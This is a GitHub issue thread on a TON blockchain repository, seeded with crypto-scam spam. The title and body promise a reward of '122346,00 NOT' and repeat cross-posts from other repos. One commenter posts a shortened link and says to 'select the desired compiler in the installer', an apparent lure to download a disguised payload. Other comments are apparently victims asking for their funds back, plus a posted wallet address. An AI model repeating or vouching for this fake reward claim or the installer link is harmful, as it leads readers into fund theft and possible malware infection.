### ISSUE TITLE
> 🔒Your funds are safe, once the transaction is confirmed, you will receive + 122346,00 NOT

### ISSUE THREAD

**Issue by JDJD24-af** [ton-blockchain/ton-connect#52]
> 🔒Your funds are safe, once the transaction is confirmed, you will receive + 122346,00 NOT
> 
> _Originally posted by @wlofman021 in https://github.com/tonkeeper/opentonapi/issues/389_
> 
> _Originally posted by @wlofman021 in https://github.com/ton-blockchain/verifier/issues/215_

_Originally posted by @Ayosaja1234 in https://github.com/ton-blockchain/verifier/issues/216#issuecomment-2291326971_

_Originally posted by @Ayosaja1234 in https://github.com/ton-blockchain/wallet-contract/issues/33_

**Comment by zawa999** [comment]
try this
https://t.ly/zy17A
select the desired compiler in the installer

**Comment by Chukwunonso8** [comment]
I need my ton back please

**Comment by Chukwunonso8** [comment]
I need my ton back please

**Comment by Farahnady** [comment]
I need my ton back please

**Comment by Ha123456ma** [comment]
چقدر از من پول کم کردید پول ندادید

**Comment by mm8191** [comment]
UQDasWTnuOI4srBPkX9pufz71AV6UuJmApkUhAHeD8Kg2dHz

**Comment by mm8191** [comment]
UQDasWTnuOI4srBPkX9pufz71AV6UuJmApkUhAHeD8Kg2dHz

**Comment by joangava** [comment]
SOO FANYYYYYYY

**Comment by Ha123456ma** [comment]
Tanks it's really

در تاریخ سه‌شنبه ۲۶ نوامبر ۲۰۲۴،‏ ۳:۲۰ joangava ***@***.***>
نوشت:
